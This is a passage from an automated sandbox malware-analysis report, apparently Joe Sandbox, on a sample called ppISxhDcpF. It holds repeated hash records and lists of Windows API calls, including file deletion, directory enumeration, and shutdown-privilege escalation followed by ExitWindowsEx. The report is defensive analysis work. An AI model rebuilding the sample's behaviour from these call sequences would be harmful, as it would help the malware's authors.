                                                                                                                • Instruction Fuzzy Hash: 24C012304043184FD605F765DC45555372B77C0501B408510E5055A56FDFB459964F91
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f6d7a5a54ae6e3274e0cd90cac50baeb817e5bd2e202d241d134a67140e66821
                                                                                                                • Instruction ID: 7f085cbf68e5ba107404c51ce999300149291b4cf539034aa5c9e823f2082f26
                                                                                                                • Opcode Fuzzy Hash: f6d7a5a54ae6e3274e0cd90cac50baeb817e5bd2e202d241d134a67140e66821
                                                                                                                • Instruction Fuzzy Hash: F3C08C302683048FE200AB1DC884B0137ACFF85B04F6058E1F0048BA61CB22FC004B05
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNEL32 ref: 004032C2
                                                                                                                • GetVersion.KERNEL32 ref: 004032C8
                                                                                                                • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                                • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                                • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                                • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0043F000,00000000), ref: 00403363
                                                                                                                • CharNextW.USER32(00000000,0043F000,?), ref: 0040338A
                                                                                                                  • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,?,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                  • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                • GetTempPathW.KERNEL32(00000400,00441800), ref: 004034C5
                                                                                                                • GetWindowsDirectoryW.KERNEL32(00441800,000003FB), ref: 004034D6
                                                                                                                • lstrcatW.KERNEL32(00441800,\Temp), ref: 004034E2
                                                                                                                • GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp), ref: 004034F6
                                                                                                                • lstrcatW.KERNEL32(00441800,Low), ref: 004034FE
                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low), ref: 0040350F
                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,00441800), ref: 00403517
                                                                                                                • DeleteFileW.KERNEL32(00441000), ref: 0040352B
                                                                                                                  • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                                • ExitProcess.KERNEL32 ref: 00403618
                                                                                                                • lstrcatW.KERNEL32(00441800,~nsu,0043F000,00000000,?), ref: 0040362B
                                                                                                                • lstrcatW.KERNEL32(00441800,0040A26C,00441800,~nsu,0043F000,00000000,?), ref: 0040363A
                                                                                                                • lstrcatW.KERNEL32(00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403645
                                                                                                                • lstrcmpiW.KERNEL32(00441800,00440800,00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403651
                                                                                                                • SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 0040366D
                                                                                                                • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                                • CopyFileW.KERNEL32(00442800,0042AA28,00000001), ref: 004036DB
                                                                                                                • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                                • GetCurrentProcess.KERNEL32(?,?), ref: 00403737
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                                • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                • String ID: .tmp$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                • API String ID: 3586999533-3972089011
                                                                                                                • Opcode ID: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                                • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                                • Opcode Fuzzy Hash: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                                • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                                • GlobalAlloc.KERNEL32(?,?), ref: 00404B9D
                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                                • SetWindowLongW.USER32(?,?,00405128), ref: 00404BC9
                                                                                                                • ImageList_Create.COMCTL32(?,?,00000021,00000006,00000000), ref: 00404BDD
                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                                • SendMessageW.USER32(?,0000111B,?,00000000), ref: 00404C23
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                                • GetWindowLongW.USER32(?,?), ref: 00404D61
                                                                                                                • SetWindowLongW.USER32(?,?,00000000), ref: 00404D6F
                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404EF7
                                                                                                                • SendMessageW.USER32(?,00000420,00000000,?), ref: 00404F1B
                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                                • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                • String ID: $M$N
                                                                                                                • API String ID: 1638840714-813528018
                                                                                                                • Opcode ID: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                                • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                                • Opcode Fuzzy Hash: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                                • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58
                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(?,?,75573420,00441800,0043F000), ref: 0040586F
                                                                                                                • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,75573420,00441800,0043F000), ref: 004058B7
                                                                                                                • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,75573420,00441800,0043F000), ref: 004058DA
                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,75573420,00441800,0043F000), ref: 004058E0
                                                                                                                • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,75573420,00441800,0043F000), ref: 004058F0
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2709396267.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.2709378896.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709413927.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709432251.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.2709457878.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 2035342205-1173974218
                                                                                                                • Opcode ID: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                                • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                                • Opcode Fuzzy Hash: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                                • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7458578a6517e104961b686ae4ade4a0d15dd601446d96e7702334d9bb5cb3bd
                                                                                                                • Instruction ID: ae46f8a259c3953be7cc0a4feb21dd2ffba47df32f0a14f67610db1e1e74351b
                                                                                                                • Opcode Fuzzy Hash: 7458578a6517e104961b686ae4ade4a0d15dd601446d96e7702334d9bb5cb3bd
                                                                                                                • Instruction Fuzzy Hash: 8B629C74E01228CFEB65DF65C884B9DBBB2BB89341F1081E9D449AB351DB319E86CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2736836506.0000000038010000.00000040.00000800.00020000.00000000.sdmp, Offset: 38010000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38010000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8a8f7864f14f8a5f2905e1543ed19e70efdfa9064f0e1ae9f3a8a597dbfc0e66
                                                                                                                • Instruction ID: f03a5d26166dd9f9492ef45c430a5f7bdfd8c5a1fac112e0014b72bd99deb8f7
                                                                                                                • Opcode Fuzzy Hash: 8a8f7864f14f8a5f2905e1543ed19e70efdfa9064f0e1ae9f3a8a597dbfc0e66
                                                                                                                • Instruction Fuzzy Hash: EEC1A178E00218CFEB54DFA5C994B9DBBB2BF89300F6081A9D809AB355DB355E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2736836506.0000000038010000.00000040.00000800.00020000.00000000.sdmp, Offset: 38010000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38010000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 32f1db1733a38d1b164d67f99b1cac72414d9f6a79e90a537df9a34096ac52ce
                                                                                                                • Instruction ID: 4ff9cb6e57666b5263ef3b98436c21e2b4a761d16963ee0889c49702fdb92e1e
                                                                                                                • Opcode Fuzzy Hash: 32f1db1733a38d1b164d67f99b1cac72414d9f6a79e90a537df9a34096ac52ce
                                                                                                                • Instruction Fuzzy Hash: 3FC1B278E01218CFDB14DFA5C994B9DBBB2BF89300F5081A9D809AB355DB355E85CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2736836506.0000000038010000.00000040.00000800.00020000.00000000.sdmp, Offset: 38010000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38010000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 00db32bf063fdfd96e64abc5cc4670ee8d28fc3544dd2974cbc79ea2354ea016
                                                                                                                • Instruction ID: 44e63fb48d6a75651fba86be1a7e91655b58b0739e2d5d8c615f153a2c068863
                                                                                                                • Opcode Fuzzy Hash: 00db32bf063fdfd96e64abc5cc4670ee8d28fc3544dd2974cbc79ea2354ea016
                                                                                                                • Instruction Fuzzy Hash: A0C1B178E00218CFEB54DFA5C994B9DBBB2BF89300F6081A9D909AB355DB355E81CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2736836506.0000000038010000.00000040.00000800.00020000.00000000.sdmp, Offset: 38010000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38010000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dafd2ae91e5b55e4a85c25bdbe89fd48c3e26abb05965f1e7e0a871ace2593cb
                                                                                                                • Instruction ID: 484c9616102808c841990a0dffb0ad172f584f22fcd2823edf91bc47fd493b10
                                                                                                                • Opcode Fuzzy Hash: dafd2ae91e5b55e4a85c25bdbe89fd48c3e26abb05965f1e7e0a871ace2593cb
                                                                                                                • Instruction Fuzzy Hash: 35C19278E00218CFEB54DFA5C994B9DBBB2BF89300F6081A9D809AB355DB355E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2736836506.0000000038010000.00000040.00000800.00020000.00000000.sdmp, Offset: 38010000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38010000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7822a9f36fd879f477b31cd97595afa275ddd92f0f80e13d96c33610156f36b2
                                                                                                                • Instruction ID: c43a6c9287958edc0ed6e9f9f8ab8dfedcbf84fec3817f51d74fe52c1a096e20
                                                                                                                • Opcode Fuzzy Hash: 7822a9f36fd879f477b31cd97595afa275ddd92f0f80e13d96c33610156f36b2
                                                                                                                • Instruction Fuzzy Hash: 3DC1A178E00218CFEB54DFA5C994B9DBBB2BF89300F6081A9D809AB355DB355E85CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2736836506.0000000038010000.00000040.00000800.00020000.00000000.sdmp, Offset: 38010000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38010000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 241fd1f7f40eeeb41e932396cbaf0ce8534d20129bf50a3c8bfa0d6cdda4796a
                                                                                                                • Instruction ID: 675ba69b4246fe8c4f384e9c7c5aa181b2412016b52a3ab0f24be46151969861
                                                                                                                • Opcode Fuzzy Hash: 241fd1f7f40eeeb41e932396cbaf0ce8534d20129bf50a3c8bfa0d6cdda4796a
                                                                                                                • Instruction Fuzzy Hash: 2BC1B178E00218CFEB14DFA5C994B9DBBB2BF89301F6081A9D819AB355DB355E81CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2736836506.0000000038010000.00000040.00000800.00020000.00000000.sdmp, Offset: 38010000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_38010000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 42c37a9e51f3a932a7d9f78cf2b87edaf1cab441084e82d7bff57496deb54fc6
                                                                                                                • Instruction ID: 22b8f1697ddfcb38b91b9ca95d253b3245e443e3a7e251036e8548dfdcec8b0d
                                                                                                                • Opcode Fuzzy Hash: 42c37a9e51f3a932a7d9f78cf2b87edaf1cab441084e82d7bff57496deb54fc6
                                                                                                                • Instruction Fuzzy Hash: A7C1A278E00218CFDB14DFA5C954B9DBBB2BF89300F6081A9D909AB355DB359E85CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 193a624be05e0f53ae28eef77de46e66c592c5fb26dd22f1938b35104497e58e
                                                                                                                • Instruction ID: 88c47e51cde666ee537cf0e32ea460c6e6fc7ba5cee4e8492e991215274e6039
                                                                                                                • Opcode Fuzzy Hash: 193a624be05e0f53ae28eef77de46e66c592c5fb26dd22f1938b35104497e58e
                                                                                                                • Instruction Fuzzy Hash: C6C1A074E00218CFDB15DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9ddd23ad893a6c45090f2de6d806f2b0337e0084de88519bb6967ab530c1a116
                                                                                                                • Instruction ID: 1b060c28b181150537650f8a56c341c218208fb6dc5879aa63240b9fbd455181
                                                                                                                • Opcode Fuzzy Hash: 9ddd23ad893a6c45090f2de6d806f2b0337e0084de88519bb6967ab530c1a116
                                                                                                                • Instruction Fuzzy Hash: C3C1A178E00218CFDB14DFA5C994B9DBBB2BF89300F6081A9D909AB355DB359E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 60112b41393316e76b0e6c4d8d57eccfc4cecc819f4eef2e4c6171e974f2a4e9
                                                                                                                • Instruction ID: d92bf75db7d9c54a007ce498a5d652406604763f337a2a75d00ee9f7eadc568a
                                                                                                                • Opcode Fuzzy Hash: 60112b41393316e76b0e6c4d8d57eccfc4cecc819f4eef2e4c6171e974f2a4e9
                                                                                                                • Instruction Fuzzy Hash: B3C1A074E00218CFEB14DFA5C954B9DBBB2BF89300F6081A9D809AB355DB359E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cfd2d3a6ee436f4bb9434494302223f3b946447f9780781c3242af49acf72a70
                                                                                                                • Instruction ID: b7cb26d663500520e97dae36d7a9025e731dbaf9449b69b076de7a1a2cf98b35
                                                                                                                • Opcode Fuzzy Hash: cfd2d3a6ee436f4bb9434494302223f3b946447f9780781c3242af49acf72a70
                                                                                                                • Instruction Fuzzy Hash: A4C1A074E00218CFEB15DFA5C994B9DBBB2BF89300F6081A9D909AB355DB359E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ff21eb6d636054c2eb4be1b8c1f3312bf61a9ade584f0c1d9db6c41c11c3c361
                                                                                                                • Instruction ID: 0e7033f10cf7cdd4806c2fea600cb66c24f7e46e42ccd339103389c73dc3da46
                                                                                                                • Opcode Fuzzy Hash: ff21eb6d636054c2eb4be1b8c1f3312bf61a9ade584f0c1d9db6c41c11c3c361
                                                                                                                • Instruction Fuzzy Hash: E0C1A078E00218CFEB54DFA5C954B9DBBB2BF89300F6081A9D409AB355DB355E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a611b17a2b70a94fa2d48e468c80d82ea19d3b67fcbc039a02b32d9cd22d567b
                                                                                                                • Instruction ID: 1495855d1f889c1d569497c3a0150726cfb1a3f4c43fcc8e84b34d29463ec7b4
                                                                                                                • Opcode Fuzzy Hash: a611b17a2b70a94fa2d48e468c80d82ea19d3b67fcbc039a02b32d9cd22d567b
                                                                                                                • Instruction Fuzzy Hash: 64C1B174E00218CFEB15DFA5C954B9DBBB2BF89300F6081A9D809AB355DB359E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: fd57cbd3d80c323594cd6f7488c03fb02299d877a4b822ec36fbe2efae0749b9
                                                                                                                • Instruction ID: 9949fffad08b75cc838c7827cda48d5f98f3e75ecccc4707ec3c73339a92cfe4
                                                                                                                • Opcode Fuzzy Hash: fd57cbd3d80c323594cd6f7488c03fb02299d877a4b822ec36fbe2efae0749b9
                                                                                                                • Instruction Fuzzy Hash: 05C1B274E00218CFDB55DFA5C954B9DBBB2BF89300F6081A9D409AB355DB355E85CF10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4a406539bf132e71243fa03c440d7b299722a5d321b7b3f39d1d2427aeb15e7c
                                                                                                                • Instruction ID: 95967c0157469d44acede0f6a76b8a100266a0437f53cf8ca7f05c71b337e89c
                                                                                                                • Opcode Fuzzy Hash: 4a406539bf132e71243fa03c440d7b299722a5d321b7b3f39d1d2427aeb15e7c
                                                                                                                • Instruction Fuzzy Hash: C9C1A074E00218CFDB15DFA5C994B9DBBB2BF89300F6081A9D809AB355DB355E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a273905b774153ed71524a3c89ac18c754267da3bd3b1d5b80010ec471296249
                                                                                                                • Instruction ID: 75b927b33ad4eab9a9f5e0d25d7ce9821338410beb1025fbbf09c10211f73e20
                                                                                                                • Opcode Fuzzy Hash: a273905b774153ed71524a3c89ac18c754267da3bd3b1d5b80010ec471296249
                                                                                                                • Instruction Fuzzy Hash: 90C1A274E00218CFEB14DFA5C994B9DBBB2BF89300F6081A9D509AB355DB355E81CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2a79dd50b669e082630bd4c75bc2cf7b765ed97464d799882f3deb3323e2ad8d
                                                                                                                • Instruction ID: d439c8b315b478e78183eab562604975b85c2c0472e163ca46d4007f3ea719a8
                                                                                                                • Opcode Fuzzy Hash: 2a79dd50b669e082630bd4c75bc2cf7b765ed97464d799882f3deb3323e2ad8d
                                                                                                                • Instruction Fuzzy Hash: CFC1A078E00218CFEB15DFA5C954B9DBBB2BF89300F6081A9D809AB355DB359E85CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.2737135912.00000000384B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 384B0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_384b0000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bf8726f1dadcf9b420ac48390d1d7b74d9d10efe79b223506a4265acbdf9a54f
